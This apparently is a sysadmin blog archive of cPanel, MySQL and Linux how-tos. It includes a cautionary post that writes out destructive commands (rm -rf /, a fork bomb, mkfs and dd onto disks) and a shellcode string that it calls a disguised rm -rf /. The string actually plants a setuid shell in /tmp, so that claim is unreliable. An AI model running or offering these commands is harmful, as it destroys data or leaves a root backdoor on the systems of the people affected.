+ betaexim – Installs the latest version of exim
+ biglogcheck – looks for logs nearing 2 gigabytes in size
+ bsdcryptoinstall – Installs crypto on FreeBSD
+ bsdldconfig – Configures the proper lib directories in FreeBSD
+ bsdpkgpingtest – Tests the connection speed for downloading FreeBSD packages
+ buildbsdexpect – Install expect on FreeBSD
+ builddomainaddr – (OLD)
+ buildeximconf – Rebuilds exim.conf
+ buildpostgrebsd-dev – Installs postgresql on FreeBSD.
+ chcpass – change cpanel passwords
+ easyapache – recompile/upgrade apache and/or php
+ exim4 – reinstall exim and fix permissions
+ fixcommonproblems – fixes most common problems
+ fixfrontpageperm – fixes permission issues with Front Page
+ fixmailman – fixes common mailman issues
+ fixnamed – fixes common named issues
+ fixndc – fixes rndc errors with named
+ fixquotas – fixes quota problems
+ fullhordereset – resets horde database to a fresh one – all previous user data are lost
+ initquotas – initializes quotas
+ installzendopt – installs zend optimizer
+ killacct – terminate an account – make sure you take a backup of the account first
+ mailperm – fixes permission problems with inboxes
+ park – to park a domain
+ pkgacct – used to backup an account
+ restartsrv – restart script for services
+ restorepkg – restores an account from a backup file ( pkgacct file)
+ runlogsnow – update logs of all users
+ runweblogs – update stats for a particular user
+ securetmp – secures /tmp partition with options nosuexec and nosuid
+ suspendacct – suspends an account
+ unsuspendacct – unsuspends a suspended account
+ upcp – updates cpanel to the latest version
+ updatenow – updates the cpanel scripts
+ updateuserdomains – updates userdomain entries
==========================================================
=> Important cpanel/whm files
================================
Quote:
/etc/httpd/conf/httpd.conf – apache configuration file
/etc/exim.conf – mail server configuration file
/etc/named.conf – name server (named) configuration file
/etc/proftpd.conf – proftpd server configuration file
/etc/pure-ftpd.conf – pure-ftpd server configuration file
/etc/valiases/domainname – catchall and forwarders are set here
/etc/vfilters/domainname – email filters are set here
/etc/userdomains – all domains are listed here – addons, parked,subdomains along with their usernames
/etc/localdomains – exim related file – all domains should be listed here to be able to send mails
/var/cpanel/users/username – cpanel user file
/var/cpanel/cpanel.config – cpanel configuration file ( Tweak Settings )*
/etc/cpbackup-userskip.conf -
/etc/sysconfig/network – Networking Setup*
/etc/hosts -
/var/spool/exim -
/var/spool/cron -
/etc/resolv.conf – Networking Setup–> Resolver Configuration
/etc/nameserverips – Networking Setup–> Nameserver IPs ( FOr resellers to give their nameservers )
/var/cpanel/resellers – For addpkg, etc permissions for resellers.
/etc/chkserv.d – Main >> Service Configuration >> Service Manager *
/var/run/chkservd – Main >> Server Status >> Service Status *
/var/log/dcpumon – top log process
/root/cpanel3-skel – skel directory. Eg: public_ftp, public_html. (Account Functions–>Skeleton Directory )*
/etc/wwwacct.conf – account creation defaults file in WHM (Basic cPanel/WHM Setup)*
/etc/cpupdate.conf – Update Config *
/etc/cpbackup.conf – Configure Backup*
/etc/clamav.conf – clamav (antivirus configuration file )
/etc/my.cnf – mysql configuration file
/usr/local/Zend/etc/php.ini OR /usr/local/lib/php.ini – php configuration file
/etc/ips – ip addresses on the server (except the shared ip) (IP Functions–>Show IP Address Usage )*
/etc/ipaddrpool – ip addresses which are free
/etc/ips.dnsmaster – name server ips
/var/cpanel/Counters – To get the counter of each users.
/var/cpanel/bandwidth – To get bandwith usage of domains

Check Repair & Optimize mysql Databases


Check Repair & Optimize mysql Databases:





You can use either Mysqlcheck or Myisamchk to Check and/or Repair database tables. Mysqlcheck and Myisamchk are similar in purpose, there are some essential differences. Mysqlcheck as well as Myisamchk can Check, Repair and Analyze MyISAM tablesMysqlcheck can also check InnoDB tables, so if database engine used for the databases is other than MyISAM, i.e InnoDB then try to use Mysqlcheck cmd.
———————————————————————————————————
++  Check, Repair and Optimize Using mysqlcheck cmd:
———————————————————————————————————

+  Check, Repair and Optimize All tables in All Databases when you’re running a MySQL server on Linux.
# mysqlcheck –auto-repair –check –optimize –all-databases

OR
# mysqlcheck –all-databases -r   #repair databases
# mysqlcheck –all-databases -a   #analyze databases
# mysqlcheck –all-databases -o   #optimize databases

=> Check, Repair and Optimize Single Database Tables.
# mysqlcheck –auto-repair –check –optimize CpanelUsername_Databasename
# mysqlcheck -ro CpanelUsername_Databasename

=> To repair One Table in database:
# mysqlcheck -ro CpanelUsername_Databasename table_name

———————————————————————————————————
++
 Check, Repair and Optimize Using mysqlcheck myisamchk cmd:
———————————————————————————————————
=> For All tables in All Databases:

Shows you if any need repair:
# myisamchk –check /var/lib/mysql/*/*.MYI


Then try ‘safe-recover’ first:
# myisamchk –safe-recover /var/lib/mysql/*/*.MYI

and, if neither “safe-recover” or “recover” option works:
# myisamchk –recover /var/lib/mysql/*/*.MYI

Then use the ‘force’ flag:
# myisamchk –recover –extend-check –force /var/lib/mysql/*/*.MYI

=> For Single Database:
myisamchk -r /var/lib/mysql/[CpanelUsername_Databasename]/*
OR


cd /var/lib/mysql/[CpanelUsername_Databasename]/
To check the tables:
# myisamchk *.MYI
To repair tables:
# myisamchk -r *.MYI


Note: You can use Mysqlcheck or Myisamchk cmd line options as per your requirenemt.

Assign/change a wesite’s IP address on a cPanel cmd

Assign/change a wesite’s IP address on a cPanel server via cmd:

# /usr/local/cpanel/bin/setsiteip -u $user $ip
$user will be the Cpanel username and the $ip will be the Dedicated/Shared IP

e.g: # /usr/local/cpanel/bin/setsiteip -u linucha 76.74.254.123

Change cPanel password from Cmd:


Change cPanel password from Cmd:



1) You can change the Cpanel password using below cmd as well as you need to Synchronize the password with your default FTP user, if you are unable to use the new password to connect to ftp account.# /scripts/chpass Username Password

Username : cPanel account username
Password : New password that to be set

Note: Your password should not contain special characters

2) Synchronize the new password with the default FTP user

# /scripts/ftpupdate

Account Creation Status: failed (Unable to validate setting for cpmod...) ==cpanel /script/restorepkg error

Extracting tarball................... ............... ............... Done
Extracting Domain....Done
Generating Account....

Account Creation Status: failed (Unable to validate setting for cpmod...)

Extract Failed
Invalid Account

Solution:

1) In order to get this issue resolved first of all you need to extract the backup file in test directory:

2) then go to the the directory which you just extracted then go to cp directory

3) there you will get the file with cpanel username you need to edit that file and check for

FEATURELIST and RS

if these values are something custom then you need to set them as :

FEATURELIST=default
RS=x3

save this file and now compress the backup again and try to restore it.

It should get restored without any issues.

Wednesday, March 20, 2013

install php shield in phpmotion

Installing phpShield Loaders
The first thing we need to do is check a couple of PHP settings. The easiest way to do this is with a phpinfo file. If you don't know how to create a phpinfo file, you can
Now that you have a php info file, upload it to your website's public_html directory and view it in your browser by typing http://www.yoursite.com/phpinfo.php in your address bar. You want to find/verify the following in your phpinfo.php file:Your PHP version
Thread Safety is disabled
enable_dl is set to on
The path to your extension_dir
Path to your php.ini file
Now connect to your webserver using your favorite SSH client and login as root.
Create a new working directory then change directories:

mkdir ~/phpshield cd ~/phpshield

Download the phpSHIELD loaders:

wget http://phpshield.com/loaders/phpshield.loaders.linux.zip

or if you have a 64 bit OS (most people will have a 32 bit OS so you will most likely use the code above)

wget http://phpshield.com/loaders/phpshield.loaders.linux-64.zip

Extract the loaders:

unzip phpshield.loaders.linux.zip

If you do a directory list: ls

you will see a bunch of files named phpshield.4.3.lin to phpshield.5.2.lin

. What we want to do here is find the phpshield file with the number that matches your PHP version. You can find your PHP version at the very top of your phpinfo file from earlier.
Now we need to copy the appropriate phpshield loader file to your PHP extensions directory.

cp ~/phpshield/phpshield.x.x.lin /path/to/your/php/extensions/directory

Replace x.x above with your PHP version and use the path to your PHP extensions directory (you should have found this in step 2 above.)

Open your php.ini file

nano /path/to/php/ini/php.ini

 

You should have found the path to your php.ini file in your phpinfo.php file from earlier.

Append the following to the Dynamic Extensions section of your php.ini file:

extension=phpshield/phpshield.x.x.lin

Replace x.x with the number on the phpshield file you moved earlier.
Finally, restart httpd: /etc/rc.d/init.d/httpd restart

func setlocale(ru_RU.CP1251) php

func setlocale(ru_RU.CP1251)

 

localedef --no-archive -c -i ru_RU -f CP1251 ru_RU.cp1251

Sunday, March 10, 2013

How to enable/Disable cPanel webmail interface for a user account or in server.

How to enable/Disable cPanel webmail interface for a user account or in server.

Customer wants to enable only the HORDE webmail interface for his domain and disable the rest. Usually there are three (3) webmail clients (horde, squirrel mail, roundcube). However, I was advised to make sure that a specific customer does not see more than one specified. I enabled “AUTOLOAD” option in the webmail interface but he is not satisfied. He came back asking to allow only HORDE interface for his webmail. How should i do that?

Solution: Consider my domain name is “hemanth.com” and my account name is “hemanth“. Now follow the steps below.
====================This option for that particular user account:
1) SSH to your server
2) Go to “cd /var/cpanel/users/”
3) vi hemanth
4) Paste the following lines
skiphorde=0
skipsqmail=1
skiprcmail=1



Note: The option 0 is enable and 1 is disable. in above line only HORDE is enabled in the webmail and Roundcube and squirrel  is disabled.


5) Then restart the cpanel service
/etc/init.d/cpanel restart


Now login to your webmail and check for the option.


This will change the server wide for all the domains in the server:
1) Login to your WHM
2) Go to “Server Configuration”
3) Click on “Tweak Settings”
4) Select mail option.
5) Turn off “Round Cube and Squirrel”
6) Save it.====================Redirections

http://your-domain.com:2095/3rdparty/roundcube/index.php
http://your-domain.com:2095/horde/login.php


http://your-domain.com:2095/3rdparty/squirrelmail/src/login.php


Note: You must replace your-domain.com with your actual domain name in the above examples.

Php.ini using .htaccess

http://www.suphp.org/DocumentationView.html?file=apache/CONFIG

if you want to use "/path/to/server/config/php.ini", use
"suPHP_ConfigPath /path/to/server/config".

in .htaccess

Saturday, March 9, 2013

Htop installation

Htop is an interactive and real time process monitoring application for Linux. It shows complete list of processes running and easy to use for normal tasks. We can interact with mouse those who love to play with mouse. You can scroll vertically to view the full process list, and scroll horizontally to view the full command line of the process.

Install Htop from source

Download the htop source from : http://sourceforge.net/projects/htop/

cd /usr/src/
wget http://downloads.sourceforge.net/project/htop/htop/0.8.3/htop-0.8.3.tar.gz?r=http%3A%2F%2Fsourceforge.net%2Fprojects%2Fhtop%2F&ts=1283665168&use_mirror=cdnetworks-kr-2tar zxvf htop-0.8.3.tar.gz
cd htop-0.8.3
./configure
yum install ncurses-devel
make all
make install


Htop installation on 64bit centos version 6 RPM Package


wget http://apt.sw.be/redhat/el6/en/x86_64/rpmforge/RPMS/htop-0.9-1.el6.rf.x86_64.rpm
rpm -i htop-0.9-1.el6.rf.x86_64.rpm


Htop installation on 32bit centos version 6 RPM Package

wget http://apt.sw.be/redhat/el6/en/i386/rpmforge/RPMS/htop-0.9-1.el6.rf.i686.rpm
rpm -i htop-0.9-1.el6.rf.i686.rpm


Htop installation on 64bit centos RPM Package

and if your linux centos version is 64bit use this instead:

wget http://packages.sw.be/htop/htop-0.8.3-1.el5.rf.x86_64.rpm
rpm -i htop-0.8.3-1.el5.rf.x86_64.rpm


Htop Installation on 32bit Centos RPM Package


wget http://packages.sw.be/htop/htop-0.8.3-1.rh9.rf.i386.rpm
rpm -i htop-0.8.3-1.rh9.rf.i386.rpm


yum install htop*

How to Use htop

for using htop you can simply run htop command

htop


also there are some other options for example the delay time that is -d

htop -d 2


That the above will delay the refresh time to 2 seconds

To list only the specific user in the system try -u for exampe : htop -u apache (will list only the process run by the apache user)

Wednesday, March 6, 2013

MailMon installtion

cd /usr/src/
wget http://www.mycutelife.net/sanju/newt...mon_1-3.tar.gz
tar -xvzf mailmon_1-3.tar.gz
cd /usr/src/MailMon
cp -f /usr/sbin/sendmail /usr/sbin/mon.bkp
wget http://www.mycutelife.net/sanju/newt...on/mailmon.new
sed -e s/opteron.dnsprotect.com/$hostname/g mailmon.new > mailmon.temp;
cp -f mailmon.temp /usr/sbin/sendmail
cd /usr/sbin
chown root.mailtrap sendmail
chmod 755 sendmail
chattr +i sendmail
cd /var/log
touch mailmon.log
chmod 622 mailmon.log
touch mailmon.junk
chmod 622 mailmon.junk
mysql
mysql>create database mailmon2005;
mysql>grant all privileges on mailmon2005.* to mailmon2005@localhost identified by '123dsa';
mysql>use mailmon2005;
CREATE TABLE `limits` (
`id` int(11) NOT NULL auto_increment,
`user` varchar(20) NOT NULL default '',
`speedlimit` int(11) NOT NULL default '0',
`seconds` int(11) NOT NULL default '0',
PRIMARY KEY (`id`)
) TYPE=MyISAM AUTO_INCREMENT=6 ;
INSERT INTO `limits` VALUES (6, 'cpanel', 200, 3600);
CREATE TABLE `mailmon` (
`user` varchar(20) NOT NULL default '',
`timestamp` int(10) unsigned NOT NULL default '0',
`script_name` varchar(255) NOT NULL default '',
KEY `user` (`user`,`timestamp`)
) TYPE=MyISAM;
mysql> quit;

Monday, March 4, 2013

Mysql -> add/drop/grant/revoke/backup/restore.

mysql -u <username> -p
Enter password:

Create database command:
--------------------------------

mysql> CREATE DATABASE <database>;

eg:

mysql> CREATE DATABASE ACCOUNTS;


We can now check for the presence of this database by typing:

mysql> SHOW DATABASES;

+-------------+
| Database |
+-------------+
| mysql |
| accounts |
+-------------+

USE Database:
-----------------

The USE db_name statement tells MySQL to use the db_name database as the default (current) database for subsequent statements. The database remains the default until the end of the session or until another USE statement is issued:

mysql> USE accounts;
mysql> SELECT COUNT(*) FROM mytable; # selects from db1.mytable
mysql> USE sales;
mysql> SELECT COUNT(*) FROM mytable; # selects from db2.mytable

Making a particular database current by means of the USE statement does not preclude you from accessing tables in other databases. The following example accesses the author table from the db1 database and the editor table from the db2 database:

mysql> USE accounts;
mysql> SELECT author_name,editor_name FROM author,sales.editor
-> WHERE author.editor_id = sales.editor.editor_id;



Delete / Remove database command:
--------------------------------------------

DROP DATABASE <database>

eg:

DROP DATABASE accounts;


Granting Privileges on the new database:
-----------------------------------------------

mysql> GRANT ALL PRIVILEGES ON DatabaseName.* TO Username@localhost

or

mysql> GRANT ALL PRIVILEGES ON DatabaseName.* TO Username@localhost IDENTIFIED BY 'newpassword';

mysql> GRANT SELECT,INSERT,UPDATE,DELETE ON vworks.* TO newuser@localhost IDENTIFIED BY 'newpassword';


mysql> GRANT ALL PRIVILEGES ON DatabaseName.* TO Username@192.168.0.2 IDENTIFIED BY 'newpassword';

Now a user on the machine '192.168.0.2' can connect to the database. To allow a user to connect from anywhere you would use a wildcard '%'

mysql> GRANT ALL PRIVILEGES ON DatabaseName.* TO Username@localhost IDENTIFIED BY 'newpassword' WITH GRANT OPTION;

This would allow the user 'newuser' to log into the database and give their friend privileges to SELECT,INSERT,UPDATE or DELETE from the database.


REVOKING Privileges:
-------------------------

For example to REVOKE the privileges assigned to a user called 'user1':

mysql> REVOKE ALL PRIVILEGES ON DATABASENAME.* FROM user1@localhost;

Or just to remove UPDATE, INSERT and DELETE privileges to that data cannot be changed.

mysql> REVOKE INSERT,UPDATE,DELETE ON DATABASENAME.* FROM user1@localhost;


Backing Up DataBase:
-------------------------

mysqlhotcopy -u <username> -p <database> /backup/location/


Which SHOULD copy all the tables (*.frm, *.MYI, *.MYD) into the new directory - the script does require the DBI perl module though. To restore these backup files simply copy them back into your MySQL data directory.


This is my preferred method of backing up. This outputs the table structure and data in series of SQL commands stored in a text file. The simplified syntax is

mysqldump -u <username> -p <database> > file.sql

eg:

mysqldump -u user1 -p accounts > dump.sql


Restoring a DataBase from Dump:
---------------------------------------

mysqldump -u <username> -p <database> < file.sql

eg:

mysqldump -u user1 -p accounts < dump.sql

Sunday, March 3, 2013

Deadly Commands You Should Never Run on Linux

rm -rf / – Deletes Everything!

The command rm -rf / deletes everything it possible can, including files on your hard drive and files on connected removable media devics. This command is more understandable if it’s broken down:

rm – Remove the following files.

-rf – Run rm recursively (delete all files and folders inside the specified folder) and force-remove all files without prompting you.

/ – Tells rm to start at the root directory, which contains all the files on your computer and all mounted media devices, including remote file shares and removable drives.

Linux will happily obey this command and delete everything without prompting you, so be careful when using it! The rm command can also be used in other dangerous ways – rm –rf ~ would delete all files in your home folder, while rm -rf .* would delete all your configuration files.

The Lesson: Beware rm -rf.
Disguised rm –rf /

Here’s another snippet of code that’s all over the web:

char esp[] __attribute__ ((section(“.text”))) /* e.s.p
release */
= “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68?
“\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99?
“\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7?
“\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56?
“\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31?
“\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69?
“\x6e\x2f\x73\x68\x00\x2d\x63\x00?
“cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;”;

This is the hex version of rm –rf / – executing this command would wipe out your files just as if you had run rm –rf /.

The Lesson: Don’t run weird-looking, obviously disguised commands that you don’t understand.
:(){ :|: & };: – Fork Bomb

The following line is a simple-looking, but dangerous, bash function:

:(){ :|: & };:

This short line defines a shell function that creates new copies of itself. The process continually replicates itself, and its copies continually replicate themselves, quickly taking up all your CPU time and memory. This can cause your computer to freeze. It’s basically a denial-of-service attack.

The Lesson: Bash functions are powerful, even very short ones.

Image Credit: Dake on Wikimedia Commons
mkfs.ext4 /dev/sda1 – Formats a Hard Drive

The mkfs.ext4 /dev/sda1 command is simple to understand:

mkfs.ext4 – Create a new ext4 file system on the following device.

/dev/sda1 – Specifies the first partition on the first hard drive, which is probably in use.

Taken together, this command can be equivalent to running format c: on Windows – it will wipe the files on your first partition and replace them with a new file system.

This command can come in other forms as well – mkfs.ext3 /dev/sdb2 would format the second partition on the second hard drive with the ext3 file system.

The Lesson: Beware running commands directly on hard disk devices that begin with /dev/sd.
command > /dev/sda – Writes Directly to a Hard Drive

The command > /dev/sda line works similarly – it runs a command and sends the output of that command directly to your first hard drive, writing the data directly to the hard disk drive and damaging your file system.

command – Run a command (can be any command.)

> – Send the output of the command to the following location.

/dev/sda – Write the output of the command directly to the hard disk device.

The Lesson: As above, beware running commands that involve hard disk devices beginning with /dev/sd.
dd if=/dev/random of=/dev/sda – Writes Junk Onto a Hard Drive

The dd if=/dev/random of=/dev/sda line will also obliterate the data on one of your hard drives.

dd – Perform low-level copying from one location to another.

if=/dev/random – Use /dev/random (random data) as the input – you may also see locations such as /dev/zero (zeros).

of=/dev/sda – Output to the first hard disk, replacing its file system with random garbage data.

The Lesson: dd copies data from one location to another, which can be dangerous if you’re copying directly to a device.

Image Credit: Matt Rudge on Flickr
mv ~ /dev/null – Moves Your Home Directory to a Black Hole

/dev/null is another special location – moving something to /dev/null is the same thing as destroying it. Think of /dev/null as a black hole. Essentially, mv ~ /dev/null sends all your personal files into a black hole.

mv – Move the following file or directory to another location.

~ – Represents your entire home folder.

/dev/null – Move your home folder to /dev/null, destroying all your files and deleting the original copies.



Log File paths Directadmin panel

The first place you should go when trying to debug a problem is the log file for that program.   The list of Log Files are as follows:

DirectAdmin:

/var/log/directadmin/error.log
/var/log/directadmin/errortaskq.log
/var/log/directadmin/system.log
/var/log/directadmin/security.log
Apache:

/var/log/httpd/error_log
/var/log/httpd/access_log
/var/log/httpd/suexec_log
/var/log/httpd/fpexec_log
/var/log/httpd/domains/domain.com.error.log
/var/log/httpd/domains/domain.com.log
/var/log/messages (generic errors)
Proftpd:

/var/log/proftpd/access.log
/var/log/proftpd/auth.log
/var/log/messages (generic errors)
PureFTPd:

/var/log/pureftpd.log
Dovecot and vm-pop3d:

/var/log/maillog
/var/log/messages
named (bind):

/var/log/messages
exim:

/var/log/exim/mainlog
/var/log/exim/paniclog
/var/log/exim/processlog
/var/log/exim/rejectlog

(on FreeBSD, they have "exim_" in front of the filenames)

mysqld:
RedHat:

/var/lib/mysql/server.hostname.com.err

FreeBSD and Debian:

/usr/local/mysql/data/server.hostname.com.err
crond:

/var/log/cron